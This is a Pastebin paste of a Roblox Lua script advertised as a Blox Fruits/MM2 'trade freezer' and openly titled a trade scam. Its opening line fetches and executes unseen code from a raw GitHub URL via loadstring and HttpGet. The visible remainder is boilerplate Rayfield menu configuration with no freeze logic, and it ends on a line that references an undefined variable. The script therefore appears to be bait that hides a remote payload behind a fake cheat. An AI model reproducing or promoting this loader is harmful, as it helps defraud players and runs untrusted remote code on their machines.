Advertisement
battlewawa22

Blox Fruits TRADE SCAMM

Jan 30th, 2025 (edited)
3,274
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.13 KB | Gaming | 0 0
  1. loadstring(game:HttpGet("https://raw.githubusercontent.com/battlewawa/Join-BLOX-FRUITS-SCRIPT/refs/heads/main/Script%20OP%20v2"))()
  2. local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()
  3.  
  4. local Window = Rayfield:CreateWindow({
  5.    Name = "⭐ MM2 TRADE FREEZER ⭐ ",
  6.    Icon = 0, -- Icon in Topbar. Can use Lucide Icons (string) or Roblox Image (number). 0 to use no icon (default).
  7.    LoadingTitle = "MM2 Trade Scamm",
  8.    LoadingSubtitle = "by ScriptBoy",
  9.    Theme = "Default", -- Check https://docs.sirius.menu/rayfield/configuration/themes
  10.  
  11.    DisableRayfieldPrompts = false,
  12.    DisableBuildWarnings = false, -- Prevents Rayfield from warning when the script has a version mismatch with the interface
  13.  
  14.    ConfigurationSaving = {
  15.       Enabled = true,
  16.       FolderName = nil, -- Create a custom folder for your hub/game
  17.       FileName = "Big Hub"
  18.    },
  19.  
  20.    Discord = {
  21.       Enabled = false, -- Prompt the user to join your Discord server if their executor supports it
  22.       Invite = "noinvitelink", -- The Discord invite code, do not include discord.gg/. E.g. discord.gg/ ABCD would be ABCD
  23.       RememberJoins = true -- Set this to false to make them join the discord every time they load it up
  24.    },
  25.  
  26.    KeySystem = false, -- Set this to true to use our key system
  27.    KeySettings = {
  28.       Title = "Untitled",
  29.       Subtitle = "Key System",
  30.       Note = "No method of obtaining the key is provided", -- Use this to tell the user how to get a key
  31.       FileName = "Key", -- It is recommended to use something unique as other scripts using Rayfield may overwrite your key file
  32.       SaveKey = true, -- The user's key will be saved, but if you change the key, they will be unable to use your script
  33.       GrabKeyFromSite = false, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from
  34.       Key = {"Hello"} -- List of keys that will be accepted by the system, can be RAW file links (pastebin, github etc) or simple strings ("hello","key22")
  35.    }
  36. })
  37.  
  38. local MainTab = Window:CreateTab("🧊 Freeze Trade", nil) -- Title, Image
  39. local MainSection = Tab:CreateSection("FREEZER")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement